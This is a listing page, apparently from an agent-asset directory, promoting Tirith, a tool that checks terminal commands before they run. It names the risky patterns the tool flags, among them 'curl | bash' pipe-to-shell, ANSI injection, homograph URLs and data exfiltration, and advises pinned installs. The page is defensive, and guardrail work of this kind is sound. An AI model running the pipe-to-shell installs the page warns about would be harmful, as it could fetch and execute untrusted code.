CLI ToolsMay 12, 2026·2 min read

Tirith — Terminal Security for AI Agents

Tirith flags risky terminal commands for developers and AI agents—pipe-to-shell, ANSI injection, homograph URLs, and data exfiltration—before execution.

Script Depot
Script Depot · Community
Agent ready

This asset can be read and installed directly by agents

TokRepo exposes a universal CLI command, install contract, metadata JSON, target-specific plan, and raw content links so agents can judge fit, risk, and next actions.

Needs Confirmation · 62/100Policy: confirm
Target
Claude Code
Kind
Cli
Install
Single
Trust
Trust: Established
Entrypoint
README.md
Universal CLI install command
npx tokrepo install b64aa0f0-2f92-4b9a-9b52-8cc0c6a5c8b3
install contractmetadata JSONtarget planraw content
Intro

Tirith flags risky terminal commands for developers and AI agents—pipe-to-shell, ANSI injection, homograph URLs, and data exfiltration—before execution.

  • Best for: teams running agent-driven shell commands who need guardrails against copy-paste supply-chain tricks
  • Works with: macOS/Linux/Windows installs, YAML policy files, shell hooks, optional MCP server mode and setup guides for popular AI CLIs
  • Setup time: 10–20 minutes

Practical Notes

  • README documents policy init/validate/test commands and a strictness model (paranoia 1–4).
  • Install options include Homebrew, npm, Cargo, and OS packages; policy discovery looks for .tirith/policy.yaml.

Where It Fits in an Agent Workflow

If you let an agent propose commands, Tirith can sit in front of execution:

  • Use policy tests during planning to catch “curl | bash” and similar source-to-sink flows early.
  • Keep a small allowlist (domains you trust) and blocklist (known bad) as code in your repo.
  • In CI, apply a stricter scan profile (README shows scan profiles under policy) for configs like .claude/*, mcp.json, and other agent-control files.

Practical “Do This, Not That”

  • Prefer pinned installs over curl | bash whenever possible.
  • If you must run a script installer, validate the URL (homograph/invisible unicode is a real class of attacks) and record the checksum or release tag you used.

FAQ

Q: Does Tirith execute commands for me? A: It can validate and policy-test commands; the goal is to surface risk before you run them.

Q: Where does the policy live? A: The README states it discovers .tirith/policy.yaml in your repo (walking up), or a user config path.

Q: Can I tune strictness? A: Yes—policy parameters include a paranoia level and action overrides for escalation.

🙏

Source & Thanks

Source: https://github.com/sheeki03/tirith > License: AGPL-3.0 > GitHub stars: 2,307 · forks: 80

Discussion

Sign in to join the discussion.
No comments yet. Be the first to share your thoughts.

Related Assets

agent-audit — Security Linter for LLM Agents

Run a static security scanner for LLM agents: 53 OWASP Agentic Top 10 rules, prompt-injection checks, and MCP config auditing via agent-audit scan.

CLI Tools
Agent Toolkit

herdr — Terminal Multiplexer for Agents

Terminal-first agent multiplexer with persistent sessions, panes, and workspaces. Track agent state (blocked/working/done) without leaving your terminal.

CLI Tools
Script Depot

herdr — Terminal Multiplexer for Coding Agents

herdr runs multiple coding agents in one persistent terminal workspace with pane control, detach-and-resume flow, and remote status check-ins.

CLI Tools
Agent Toolkit

AgentShield — Security Audit for Claude Code

Security auditor for Claude Code configs. Scans `.claude/` for secrets, risky permissions, hook injection, and MCP misconfigs; outputs CI-ready reports.

CLI Tools
Script Depot
Home🔍Search👤Me